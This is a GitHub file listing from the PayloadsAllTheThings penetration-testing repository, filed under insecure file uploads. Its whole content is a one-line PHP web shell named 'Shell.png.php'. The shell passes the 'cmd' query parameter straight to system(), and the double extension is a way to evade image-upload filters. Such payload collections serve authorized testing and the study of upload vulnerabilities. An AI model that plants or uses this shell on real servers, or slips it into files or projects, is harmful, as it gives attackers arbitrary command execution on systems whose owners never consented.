PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.png.php

1 line
No EOL
43 B
PHP
Executable file

<?php echo "Shell";system($_GET['cmd']); ?>